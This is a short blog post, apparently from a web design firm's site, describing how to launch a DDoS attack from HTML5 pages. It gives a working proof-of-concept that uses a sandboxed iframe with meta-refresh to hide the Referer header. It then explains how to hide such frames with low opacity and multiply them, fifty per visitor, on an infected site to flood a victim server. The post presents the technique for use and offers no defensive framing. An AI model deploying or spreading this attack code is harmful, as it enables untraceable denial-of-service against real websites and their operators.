It is interesting how few people came up with the same concept, but nevertheless we will publish it.

HTML5 offers great opportunities for developers, allows you to create dynamic web pages, WYSIWYG support and other interesting solutions, which once could only dream of.

How can you use HTML to perform a DDoS attack?

The basic way, it is a malicious site to spice up the IMG tag with the SRC attribute, directing the image located on the victim side.
The downside of this approach include left in the header REFERER. Attacked party is then in possession of logs, indicating where in / in the attack took place.

Another slightly more interesting solution is to use the IFRAME tag parameter SANDBOX (with the possibility of execution of the script js).
At present, most browsers is lost header REFERER when you use the classic html refreshing.

The following code is a PoC for this attack type:

<!DOCTYPE HTML><html> <head> <title>DoS via HTML5 – Kruczek Robert ::</title> </head> <body> <iframe src=”about:blank” sandbox=”allow-scripts” id=”noheader” style=”width: 99%; height: 99%; position: absolute;”></iframe> <script type=”text/javascript”> function noheader(url) { var src = (‘<html><head><meta http-equiv=”refresh” content=”1; url=’+ url + ‘”></head><body>w8</body></html>’); document.getElementById(‘noheader’).srcdoc=src; } noheader(‘’); </script> </body></html>

It is logical that a request will not do much, but let us consider that our iframe can oscillate using CSS for example. Opacity: 0.1; – Then the frame will be almost imperceptible, we can further automatically generate frame in loop, where 50 frames per user calmly enough, then perform 50 full views of the victim of the page along with the implementation of all planted on the current subpage server-side scripts.
The attack is gaining momentum with the size of the infected site – 1,000 people online times 50 frames?

©2020 Simon's network | Bespoke Website Desgin London


Log in with your credentials

Forgot your details?